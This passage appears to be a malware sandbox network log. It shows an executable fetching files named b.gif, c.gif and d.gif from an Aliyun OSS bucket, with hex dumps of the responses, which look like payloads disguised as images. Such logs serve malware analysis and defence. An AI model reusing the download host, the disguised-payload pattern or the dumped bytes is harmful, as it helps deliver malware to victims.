                                Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_
                                2025-01-07 03:15:34 UTC4096INData Raw: 56 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2
                                Data Ascii: VZ~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJL
                                2025-01-07 03:15:34 UTC4096INData Raw: 65 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd
                                Data Ascii: eWUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.84971039.103.20.484437668C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                TimestampBytes transferredDirectionData
                                2025-01-07 03:15:35 UTC111OUTGET /b.gif HTTP/1.1
                                User-Agent: GetData
                                Host: jylhok.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-07 03:15:36 UTC547INHTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Tue, 07 Jan 2025 03:15:36 GMT
                                Content-Type: image/gif
                                Content-Length: 125333
                                Connection: close
                                x-oss-request-id: 677C9C582A05773233776008
                                Accept-Ranges: bytes
                                ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                Last-Modified: Mon, 06 Jan 2025 08:35:20 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 10333201072197591521
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000104
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                x-oss-server-time: 11
                                2025-01-07 03:15:36 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                2025-01-07 03:15:36 UTC4096INData Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19
                                Data Ascii: ^_X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                2025-01-07 03:15:36 UTC4096INData Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0
                                Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                2025-01-07 03:15:36 UTC4096INData Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9
                                Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                2025-01-07 03:15:36 UTC4096INData Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7
                                Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                2025-01-07 03:15:36 UTC4096INData Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4
                                Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                2025-01-07 03:15:36 UTC4096INData Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2
                                Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                2025-01-07 03:15:36 UTC4096INData Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d
                                Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                2025-01-07 03:15:36 UTC4096INData Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8
                                Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                2025-01-07 03:15:36 UTC4096INData Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf
                                Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJ


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.84971139.103.20.484437668C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                TimestampBytes transferredDirectionData
                                2025-01-07 03:15:37 UTC111OUTGET /c.gif HTTP/1.1
                                User-Agent: GetData
                                Host: jylhok.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-07 03:15:38 UTC546INHTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Tue, 07 Jan 2025 03:15:38 GMT
                                Content-Type: image/gif
                                Content-Length: 10681
                                Connection: close
                                x-oss-request-id: 677C9C5A9F27CB3430F36997
                                Accept-Ranges: bytes
                                ETag: "10A818386411EE834D99AE6B7B68BE71"
                                Last-Modified: Mon, 06 Jan 2025 08:35:19 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 10287299869673359293
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000104
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                x-oss-server-time: 11
                                2025-01-07 03:15:38 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                2025-01-07 03:15:38 UTC4096INData Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66
                                Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
                                2025-01-07 03:15:38 UTC3035INData Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0
                                Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.84971239.103.20.484437668C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                TimestampBytes transferredDirectionData
                                2025-01-07 03:15:39 UTC111OUTGET /d.gif HTTP/1.1
                                User-Agent: GetData
                                Host: jylhok.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-07 03:15:39 UTC547INHTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Tue, 07 Jan 2025 03:15:39 GMT
                                Content-Type: image/gif
                                Content-Length: 3892010
                                Connection: close
                                x-oss-request-id: 677C9C5B998B3E3138B653D9
                                Accept-Ranges: bytes
                                ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                Last-Modified: Mon, 06 Jan 2025 08:35:24 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 3363616613234190325
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000104
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                x-oss-server-time: 22
                                2025-01-07 03:15:39 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                2025-01-07 03:15:39 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
